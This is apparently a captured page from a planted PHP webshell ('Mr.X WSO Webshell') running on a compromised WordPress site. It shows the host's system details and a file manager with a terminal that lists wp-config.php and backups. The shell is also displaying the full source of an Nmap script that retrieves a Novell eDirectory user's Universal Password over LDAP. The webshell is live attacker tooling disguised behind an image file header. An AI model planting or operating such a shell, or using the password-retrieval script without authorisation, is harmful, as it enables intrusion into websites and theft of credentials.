����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:
Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 05:32:42
1999.30 GB Free: 60.29 GB (3%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 05:31:14drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-09 05:31:36drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: //usr/share/nmap/scripts/ldap-novell-getpass.nse
local bin = require "bin"
local comm = require "comm"
local ldap = require "ldap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"

description = [[
Attempts to retrieve the Novell Universal Password for a user. You
must already have (and include in script arguments) the username and password for an eDirectory server
administrative account.
]]

---
-- Universal Password enables advanced password policies, including extended 
-- characters in passwords, synchronization of passwords from eDirectory to
-- other systems, and a single password for all access to eDirectory.
--
-- In case the password policy permits administrators to retrieve user
-- passwords ("Allow admin to retrieve passwords" is set in the password
-- policy) this script can retrieve the password.
--
-- @args ldap-novell-getpass.account The name of the account to retrieve the
--       password for
-- @args ldap-novell-getpass.username The LDAP username to use when connecting
--       to the server
-- @args ldap-novell-getpass.password The LDAP password to use when connecting
--       to the server
-- 
-- @usage
-- nmap -p 636 --script ldap-novell-getpass --script-args \
--	'ldap-novell-getpass.username="CN=admin,O=cqure", \
-- 	ldap-novell-getpass.password=pass1234, \
-- 	ldap-novell-getpass.account="CN=paka,OU=hr,O=cqure"'
--
-- @output
-- PORT    STATE SERVICE REASON
-- 636/tcp open  ldapssl syn-ack
-- | ldap-novell-getpass: 
-- |   Account: CN=patrik,OU=security,O=cqure 
-- |_  Password: foobar
--

-- Version 0.1
-- Created 05/11/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>


author = "Patrik Karlsson"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}


portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"})

function action(host,port)

	local username = stdnse.get_script_args("ldap-novell-getpass.username")
	local password = stdnse.get_script_args("ldap-novell-getpass.password") or ""
	local account = stdnse.get_script_args("ldap-novell-getpass.account")

	if ( not(username) ) then
		return "\n  ERROR: No username was supplied (ldap-novell-getpass.username)"
	end
	if ( not(account) ) then
		return "\n  ERROR: No account was supplied (ldap-novell-getpass.account)"
	else
		-- do some basic account validation
		if ( not(account:match("^[Cc][Nn]=.*,") ) ) then
			return "\n  ERROR: The account argument should be specified as:\n" ..
					"  	\"CN=name,OU=orgunit,O=org\""
		end
	end

	-- In order to discover what protocol to use (SSL/TCP) we need to send a
	-- few bytes to the server. An anonymous bind should do it
	local anon_bind = bin.pack("H", "300c020101600702010304008000" )
	local socket, _, opt = comm.tryssl( host, port, anon_bind, nil )
	if ( not(socket) ) then
		return "\n  ERROR: Failed to connect to LDAP server"
	end
		
	local status, errmsg = ldap.bindRequest( socket, { 
		version = 3,
		username = username,
		password = password
		}
	)

	if ( not(status) ) then return errmsg end

	-- Start encoding the NMAS Get Password Request
	local NMASLDAP_GET_PASSWORD_REQUEST = "2.16.840.1.113719.1.39.42.100.13"
	local NMASLDAP_GET_PASSWORD_RESPONSE = "2.16.840.1.113719.1.39.42.100.14"
	-- Add a trailing zero to the account name
	local data = ldap.encode( account .. '\0' )
	
	-- The following section could do with more documentation
	-- It's based on packet dumps from the getpass utility available from Novell Cool Solutions
	-- encode the account name as a sequence
	data = ldap.encode( { _ldaptype = '30', bin.pack("H", "020101") .. data } )
	data = ldap.encode( { _ldaptype = '81', data } )
	data = ldap.encode( { _ldaptype = '80', NMASLDAP_GET_PASSWORD_REQUEST } ) .. data
	data = ldap.encode( { _ldaptype = '77', data } )

	-- encode the whole extended request as a sequence
	data = ldap.encode( { _ldaptype = '30', bin.pack("H", "020102") .. data } )

	status = socket:send(data)
	if ( not(status) ) then	return "ERROR: Failed to send request" end
	
	status, data = socket:receive()
	if ( not(status) ) then return data end
	socket:close()
	
	local _, response = ldap.decode(data)

	-- make sure the result code was a success
	local rescode = ( #response >= 2 ) and response[2]
	local respname = ( #response >= 5 ) and response[5]

	if ( rescode ~= 0 ) then 
		local errmsg = ( #response >= 4 ) and response[4] or "An unknown error occured"
		return "\n  ERROR: " .. errmsg
	end

	-- make sure we get a NMAS Get Password Response back from the server
	if ( respname ~= NMASLDAP_GET_PASSWORD_RESPONSE ) then return end
	
	local universal_pw = ( #response >= 6 and #response[6] >= 3 ) and response[6][3]

	if ( universal_pw ) then
		local output = {}
		table.insert(output, ("Account: %s"):format(account))
		table.insert(output, ("Password: %s"):format(universal_pw))
		return stdnse.format_output(true, output)
	else
		return "\n  ERROR: No password was found"
	end
end